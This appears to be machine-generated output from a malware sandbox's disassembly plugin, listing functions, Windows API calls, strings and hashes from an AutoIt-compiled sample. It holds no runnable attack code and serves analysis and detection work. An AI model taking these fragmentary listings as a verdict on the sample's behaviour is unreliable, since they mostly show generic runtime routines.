                    • Associated: 00000000.00000002.2061500145.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061582798.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061582798.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061644697.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061664234.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061733214.0000000000523000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061790179.000000000052A000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_UaOJAOMxcU.jbxd
                    Similarity
                    • API ID: ErrorMode$ObjectVariant$ClearFileFromInitInitializeInstanceRunningTableUninitialize
                    • String ID: ,,I
                    • API String ID: 2395222682-4163367948
                    • Opcode ID: 86113d1df25df9381713289ea4cd204886f45ef52b39823f92184825a9a21490
                    • Instruction ID: aabbb54c80bb5556d5779205c7c98f5c8569651e4766cb9ae3be61758569f7e0
                    • Opcode Fuzzy Hash: 86113d1df25df9381713289ea4cd204886f45ef52b39823f92184825a9a21490
                    • Instruction Fuzzy Hash: 33C138B1604305AFC700DF25C88896BB7E9FF89348F00896EF9899B251DB75ED05CB56
                    Function 004577DC Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 128registryshareCOMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 00407BCC: _memmove.LIBCMT ref: 00407C06
                    • _memset.LIBCMT ref: 0045786B
                    • WNetAddConnection2W.MPR(?,?,?,00000000), ref: 004578A0
                    • RegConnectRegistryW.ADVAPI32(?,80000002,?), ref: 004578BC
                    • RegOpenKeyExW.ADVAPI32(?,?,00000000,00020019,?,?,SOFTWARE\Classes\), ref: 004578D8
                    • RegQueryValueExW.ADVAPI32(?,00000000,00000000,00000000,?,?,?,SOFTWARE\Classes\), ref: 00457902
                    • CLSIDFromString.OLE32(?,?,?,SOFTWARE\Classes\), ref: 0045792A
                    • RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 00457935
                    • RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 0045793A
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2061522397.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2061500145.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061582798.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061582798.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061644697.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061664234.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061733214.0000000000523000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061790179.000000000052A000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_UaOJAOMxcU.jbxd
                    Similarity
                    • API ID: Close$ConnectConnection2FromOpenQueryRegistryStringValue_memmove_memset
                    • String ID: SOFTWARE\Classes\$\CLSID$\IPC$
                    • API String ID: 1411258926-22481851
                    • Opcode ID: 4434111d8f3e630182491e914928aa6b888319ba381408191320ad454d3f649a
                    • Instruction ID: bd842348e8c291230e2108f9814d7b32575dde29d3ae902d03d2cd9f0e66d559
                    • Opcode Fuzzy Hash: 4434111d8f3e630182491e914928aa6b888319ba381408191320ad454d3f649a
                    • Instruction Fuzzy Hash: 3F41FB72C14129AADF11EBA5DC85DEEB778FF04314F40447AE905B22A1DB396D08CBA8
                    Function 00480E1A Relevance: 19.4, APIs: 1, Strings: 10, Instructions: 120COMMON
                    Download Yara Rule
                    APIs
                    • CharUpperBuffW.USER32(?,?,?,?,?,?,?,0047FDAD,?,?), ref: 00480E31
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2061522397.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2061500145.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061582798.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061582798.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061644697.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061664234.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061733214.0000000000523000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061790179.000000000052A000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_UaOJAOMxcU.jbxd
                    Similarity
                    • API ID: BuffCharUpper
                    • String ID: HKCC$HKCR$HKCU$HKEY_CLASSES_ROOT$HKEY_CURRENT_CONFIG$HKEY_CURRENT_USER$HKEY_LOCAL_MACHINE$HKEY_USERS$HKLM$HKU
                    • API String ID: 3964851224-909552448
                    • Opcode ID: 8d3f5457614a560b38f905c17fe191cbfe4d6e9b901594d3939f7eaaff082135
                    • Instruction ID: 987af29362f030b9785e67816bde092fa47ad23058dcaf1b7a905610e89cab94
                    • Opcode Fuzzy Hash: 8d3f5457614a560b38f905c17fe191cbfe4d6e9b901594d3939f7eaaff082135
                    • Instruction Fuzzy Hash: 3C4183312142598BCF60FF11D891AEF3760AF21308F94882BFE5517292D77C9D1ACB69
                    Function 0045F7A1 Relevance: 19.3, APIs: 6, Strings: 5, Instructions: 75windowCOMMON
                    Download Yara Rule
                    APIs
                    • GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,00000000,?,0043E2A0,00000010,?,Bad directive syntax error,0048F910,00000000,?,?,?,>>>AUTOIT SCRIPT<<<), ref: 0045F7C2
                    • LoadStringW.USER32(00000000,?,0043E2A0,00000010), ref: 0045F7C9
                      • Part of subcall function 00407DE1: _memmove.LIBCMT ref: 00407E22
                    • _wprintf.LIBCMT ref: 0045F7FC
                    • __swprintf.LIBCMT ref: 0045F81E
                    • MessageBoxW.USER32(00000000,00000001,00000001,00011010), ref: 0045F88D
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2061522397.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2061500145.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061582798.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061582798.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061644697.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061664234.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061733214.0000000000523000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061790179.000000000052A000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_UaOJAOMxcU.jbxd
                    Similarity
                    • API ID: HandleLoadMessageModuleString__swprintf_memmove_wprintf
                    • String ID: Error: $%s (%d) : ==> %s.: %s %s$.$Line %d (File "%s"):$Line %d:
                    • API String ID: 1506413516-4153970271
                    • Opcode ID: b0a5f66eebad9f36124e6602567880734addc3d43cd627ae7dde5d3f4a6a6943
                    • Instruction ID: b323f88afb297f8589dfe01482fd0210897c7bceeb753686804773940a61526b
                    • Opcode Fuzzy Hash: b0a5f66eebad9f36124e6602567880734addc3d43cd627ae7dde5d3f4a6a6943
                    • Instruction Fuzzy Hash: 33215071904219BBCF11EF91CC0AEEE7739BF14309F04087BB515750A2EA39AA18DB59
                    Function 004652C7 Relevance: 19.3, APIs: 5, Strings: 6, Instructions: 74COMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 00407BCC: _memmove.LIBCMT ref: 00407C06
                      • Part of subcall function 00407924: _memmove.LIBCMT ref: 004079AD
                    • mciSendStringW.WINMM(status PlayMe mode,?,00000100,00000000), ref: 00465330
                    • mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 00465346
                    • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00465357
                    • mciSendStringW.WINMM(play PlayMe wait,00000000,00000000,00000000), ref: 00465369
                    • mciSendStringW.WINMM(play PlayMe,00000000,00000000,00000000), ref: 0046537A
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2061522397.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2061500145.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061582798.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061582798.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061644697.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061664234.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061733214.0000000000523000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061790179.000000000052A000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_UaOJAOMxcU.jbxd
                    Similarity
                    • API ID: SendString$_memmove
                    • String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
                    • API String ID: 2279737902-1007645807
                    • Opcode ID: a38f690a41644a1ea6aaaa90d6ed946eea0a1c3052881e4aa48fec53c4da1104
                    • Instruction ID: 2e8e5f898991f968bbba2f693440f846553d5b5edaf37d24830f39f112612e90
                    • Opcode Fuzzy Hash: a38f690a41644a1ea6aaaa90d6ed946eea0a1c3052881e4aa48fec53c4da1104
                    • Instruction Fuzzy Hash: CE119370D5015979D720B662CC49EFF7B7CEB91B48F10042F7801A21D1EDB81D45C6BA
                    Function 004646B7 Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 73networkCOMMON
                    Download Yara Rule
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2061522397.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2061500145.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061582798.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061582798.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061644697.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061664234.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061733214.0000000000523000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061790179.000000000052A000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_UaOJAOMxcU.jbxd
                    Similarity
                    • API ID: _wcscpy$CleanupStartup_memmove_strcatgethostbynamegethostnameinet_ntoa
                    • String ID: 0.0.0.0
                    • API String ID: 208665112-3771769585
                    • Opcode ID: 09d15450440633b0f7a2b62d0b119be12e95eec53dc4214b1ac8cb0b212af872
                    • Instruction ID: ae08325a14d93a890b1fa528d308863361f072a57d3f479d6846efdaae1a579c
                    • Opcode Fuzzy Hash: 09d15450440633b0f7a2b62d0b119be12e95eec53dc4214b1ac8cb0b212af872
                    • Instruction Fuzzy Hash: BD11F331600114AFDB10AB70AC46EDE77ACEB41716F5405BFF44592191FF7889858B5A
                    Function 00464F75 Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 72sleepwindowtimeCOMMON
                    Download Yara Rule
                    APIs
                    • timeGetTime.WINMM ref: 00464F7A
                      • Part of subcall function 0042049F: timeGetTime.WINMM(?,75A8B400,00410E7B), ref: 004204A3
                    • Sleep.KERNEL32(0000000A), ref: 00464FA6
                    • EnumThreadWindows.USER32(?,Function_00064F28,00000000), ref: 00464FCA
                    • FindWindowExW.USER32(00000000,00000000,BUTTON,00000000), ref: 00464FEC
                    • SetActiveWindow.USER32 ref: 0046500B
                    • SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 00465019
                    • SendMessageW.USER32(00000010,00000000,00000000), ref: 00465038
                    • Sleep.KERNEL32(000000FA), ref: 00465043
                    • IsWindow.USER32 ref: 0046504F
                    • EndDialog.USER32(00000000), ref: 00465060
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2061522397.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2061500145.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061582798.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061582798.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061644697.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061664234.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061733214.0000000000523000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061790179.000000000052A000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_UaOJAOMxcU.jbxd
                    Similarity
                    • API ID: Window$MessageSendSleepTimetime$ActiveDialogEnumFindThreadWindows
                    • String ID: BUTTON
                    • API String ID: 1194449130-3405671355
                    • Opcode ID: 8774e4f041890dbc2a91042b0544c15fbc059514b46ccdf9cc1dd7305ce15ae1
                    • Instruction ID: 17ca608856519cd1955488b4f204772d3e00e2da9bda675b1abbe090807247ff
                    • Opcode Fuzzy Hash: 8774e4f041890dbc2a91042b0544c15fbc059514b46ccdf9cc1dd7305ce15ae1
                    • Instruction Fuzzy Hash: A521A174200605BFEB505F60FC88F2A3BA9EB44749F25543EF102922B1EB758D549B6F
                    Function 0046D58D Relevance: 18.3, APIs: 12, Instructions: 283comCOMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 00409837: __itow.LIBCMT ref: 00409862
                      • Part of subcall function 00409837: __swprintf.LIBCMT ref: 004098AC
                    • CoInitialize.OLE32(00000000), ref: 0046D5EA
                    • SHGetSpecialFolderLocation.SHELL32(00000000,00000000,?), ref: 0046D67D
                    • SHGetDesktopFolder.SHELL32(?), ref: 0046D691
                    • CoCreateInstance.OLE32(00492D7C,00000000,00000001,004B8C1C,?), ref: 0046D6DD
                    • SHCreateShellItem.SHELL32(00000000,00000000,?,00000003), ref: 0046D74C
                    • CoTaskMemFree.OLE32(?,?), ref: 0046D7A4
                    • _memset.LIBCMT ref: 0046D7E1
                    • SHBrowseForFolderW.SHELL32(?), ref: 0046D81D
                    • SHGetPathFromIDListW.SHELL32(00000000,?), ref: 0046D840
                    • CoTaskMemFree.OLE32(00000000), ref: 0046D847
                    • CoTaskMemFree.OLE32(00000000,00000001,00000000), ref: 0046D87E
                    • CoUninitialize.OLE32(00000001,00000000), ref: 0046D880
                    Memory Dump Source
                    • Source File: 00000000.00000002.2061522397.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2061500145.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061582798.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061582798.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061644697.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061664234.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061733214.0000000000523000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061790179.000000000052A000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_UaOJAOMxcU.jbxd
                    Similarity
                    • API ID: FolderFreeTask$Create$BrowseDesktopFromInitializeInstanceItemListLocationPathShellSpecialUninitialize__itow__swprintf_memset
                    • String ID:
                    • API String ID: 1246142700-0
                    • Opcode ID: 1febc7807772f56294efd1fd13851000f7df353c646d9fdc6f6b769e470cf38e
                    • Instruction ID: f865a34610966cb3ccb6f29414af5a3955dc884533e4df89e7e1a7976a3b9bcc
                    • Opcode Fuzzy Hash: 1febc7807772f56294efd1fd13851000f7df353c646d9fdc6f6b769e470cf38e
                    • Instruction Fuzzy Hash: 39B11B75A00109AFDB04DFA5C888DAEBBB9FF48314F10846AF909EB261DB34ED45CB55
                    Function 0045C267 Relevance: 18.2, APIs: 12, Instructions: 174COMMON
                    Download Yara Rule
                    APIs
                    • GetDlgItem.USER32(?,00000001), ref: 0045C283
                    • GetWindowRect.USER32(00000000,?), ref: 0045C295
                    • MoveWindow.USER32(00000001,0000000A,?,00000001,?,00000000), ref: 0045C2F3
                    • GetDlgItem.USER32(?,00000002), ref: 0045C2FE
                    • GetWindowRect.USER32(00000000,?), ref: 0045C310
                    • MoveWindow.USER32(00000001,?,00000000,00000001,?,00000000), ref: 0045C364
                    • GetDlgItem.USER32(?,000003E9), ref: 0045C372
                    • GetWindowRect.USER32(00000000,?), ref: 0045C383
                    • MoveWindow.USER32(00000000,0000000A,00000000,?,?,00000000), ref: 0045C3C6
                    • GetDlgItem.USER32(?,000003EA), ref: 0045C3D4
                    • MoveWindow.USER32(00000000,0000000A,0000000A,?,-00000005,00000000), ref: 0045C3F1
                    • InvalidateRect.USER32(?,00000000,00000001), ref: 0045C3FE
                    Memory Dump Source
                    • Source File: 00000000.00000002.2061522397.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2061500145.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061582798.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061582798.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061644697.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061664234.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061733214.0000000000523000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061790179.000000000052A000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_UaOJAOMxcU.jbxd
                    Similarity
                    • API ID: Window$ItemMoveRect$Invalidate
                    • String ID:
                    • API String ID: 3096461208-0
                    • Opcode ID: ee900cb0418c209eff2971d5848f65fb009066793c70c2948a602d6ec38bc7ab
                    • Instruction ID: 11649da17df5d0755d73b9da25d5b781727aa351e01af551b5c423be9c7c6dfa
                    • Opcode Fuzzy Hash: ee900cb0418c209eff2971d5848f65fb009066793c70c2948a602d6ec38bc7ab
                    • Instruction Fuzzy Hash: 62517071B00305AFDB08CFA9DD89AAEBBB6EB88311F14853DF915E7291D7709D448B14
                    Function 0040201B Relevance: 18.2, APIs: 12, Instructions: 170timeCOMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 00401B41: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00402036,?,00000000,?,?,?,?,004016CB,00000000,?), ref: 00401B9A
                    • DestroyWindow.USER32(?,?,?,?,?,?,?,?,?,?,?,00000000,?,?), ref: 004020D3
                    • KillTimer.USER32(-00000001,?,?,?,?,004016CB,00000000,?,?,00401AE2,?,?), ref: 0040216E
                    • DestroyAcceleratorTable.USER32(00000000), ref: 0043BCA6
                    • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,004016CB,00000000,?,?,00401AE2,?,?), ref: 0043BCD7
                    • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,004016CB,00000000,?,?,00401AE2,?,?), ref: 0043BCEE
                    • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,004016CB,00000000,?,?,00401AE2,?,?), ref: 0043BD0A
                    • DeleteObject.GDI32(00000000), ref: 0043BD1C
                    Memory Dump Source
                    • Source File: 00000000.00000002.2061522397.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2061500145.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061582798.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061582798.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061644697.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061664234.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061733214.0000000000523000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061790179.000000000052A000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_UaOJAOMxcU.jbxd
                    Similarity
                    • API ID: Destroy$ImageList_$AcceleratorDeleteInvalidateKillObjectRectTableTimerWindow
                    • String ID:
                    • API String ID: 641708696-0
                    • Opcode ID: 1fe7eb120fb530a9d0c3e86e2d255934ae6300064fd6ce35022d9647bea66392
                    • Instruction ID: edfb5b42e1aee2da2af7767ce8276f4fdeab99f29820ea46fc720bac3244b47a
                    • Opcode Fuzzy Hash: 1fe7eb120fb530a9d0c3e86e2d255934ae6300064fd6ce35022d9647bea66392
                    • Instruction Fuzzy Hash: B0617E34101B10DFD735AF14CA48B2A77F1FB44316F50943EE642AAAE0C7B8A891DB99
                    Function 004021A5 Relevance: 18.1, APIs: 12, Instructions: 132COMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 004025DB: GetWindowLongW.USER32(?,000000EB), ref: 004025EC
                    • GetSysColor.USER32(0000000F), ref: 004021D3
                    Memory Dump Source
                    • Source File: 00000000.00000002.2061522397.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2061500145.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061582798.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061582798.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061644697.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061664234.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061733214.0000000000523000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061790179.000000000052A000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_UaOJAOMxcU.jbxd
                    Similarity
                    • API ID: ColorLongWindow
                    • String ID:
                    • API String ID: 259745315-0
                    • Opcode ID: c544c20de1596d8a35e8bd9b7102db0368e0aafd3e371b07eaad61ce13d863f6
                    • Instruction ID: b625a7fc61febfd2c935065ad26fa2a4911c749eaed189314b0e0014d1ee1d2c
                    • Opcode Fuzzy Hash: c544c20de1596d8a35e8bd9b7102db0368e0aafd3e371b07eaad61ce13d863f6
                    • Instruction Fuzzy Hash: 0B41E531000100EFDB215F68DC8CBBA3B65EB46331F1442BAFE619A2E1C7758C86DB69
                    Function 0046A8A7 Relevance: 17.7, APIs: 3, Strings: 7, Instructions: 183COMMON
                    Download Yara Rule
                    APIs
                    • CharLowerBuffW.USER32(?,?,0048F910), ref: 0046A90B
                    • GetDriveTypeW.KERNEL32(00000061,004B89A0,00000061), ref: 0046A9D5
                    • _wcscpy.LIBCMT ref: 0046A9FF
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2061522397.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2061500145.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061582798.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061582798.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061644697.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061664234.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061733214.0000000000523000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061790179.000000000052A000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_UaOJAOMxcU.jbxd
                    Similarity
                    • API ID: BuffCharDriveLowerType_wcscpy
                    • String ID: all$cdrom$fixed$network$ramdisk$removable$unknown
                    • API String ID: 2820617543-1000479233
                    • Opcode ID: 556639d0dcd09af84e262d548350a2ad112727df3badb39c837963bed888a9a7
                    • Instruction ID: 63d5a068ad5a56aba220708db6a6aa365c702eef260e2cf9077a2f95fd26ae7a
                    • Opcode Fuzzy Hash: 556639d0dcd09af84e262d548350a2ad112727df3badb39c837963bed888a9a7
                    • Instruction Fuzzy Hash: 6751AE711183009BC700EF15C892AAFB7E5EF94308F544C2FF495672A2EB399D19CA5B
                    Function 00487152 Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 103windowCOMMON
                    Download Yara Rule
                    APIs
                    • _memset.LIBCMT ref: 0048716A
                    • CreateMenu.USER32 ref: 00487185
                    • SetMenu.USER32(?,00000000), ref: 00487194
                    • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00487221
                    • IsMenu.USER32(?), ref: 00487237
                    • CreatePopupMenu.USER32 ref: 00487241
                    • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 0048726E
                    • DrawMenuBar.USER32 ref: 00487276
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2061522397.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2061500145.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061582798.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061582798.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061644697.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061664234.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061733214.0000000000523000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061790179.000000000052A000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_UaOJAOMxcU.jbxd
                    Similarity
                    • API ID: Menu$CreateItem$DrawInfoInsertPopup_memset
                    • String ID: 0$F
                    • API String ID: 176399719-3044882817
                    • Opcode ID: 8d361ed52167b8eab7a66d10bcbcea6876906ccdec482831028141534145e52f
                    • Instruction ID: ef621a00a8965f8f9a50d7f8a7e1c0e3a51c02c5d80a3ac9dc969039337b3b35
                    • Opcode Fuzzy Hash: 8d361ed52167b8eab7a66d10bcbcea6876906ccdec482831028141534145e52f
                    • Instruction Fuzzy Hash: 2A419B74A01204EFDB10EF64D898E9E7BB5FF09300F240469F915A7361D735A910DF98
                    Function 004874BB Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 101windowCOMMON
                    Download Yara Rule
                    APIs
                    • MoveWindow.USER32(?,?,?,000000FF,000000FF,00000000,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?), ref: 0048755E
                    • CreateCompatibleDC.GDI32(00000000), ref: 00487565
                    • SendMessageW.USER32(?,00000173,00000000,00000000), ref: 00487578
                    • SelectObject.GDI32(00000000,00000000), ref: 00487580
                    • GetPixel.GDI32(00000000,00000000,00000000), ref: 0048758B
                    • DeleteDC.GDI32(00000000), ref: 00487594
                    • GetWindowLongW.USER32(?,000000EC), ref: 0048759E
                    • SetLayeredWindowAttributes.USER32(?,00000000,00000000,00000001), ref: 004875B2
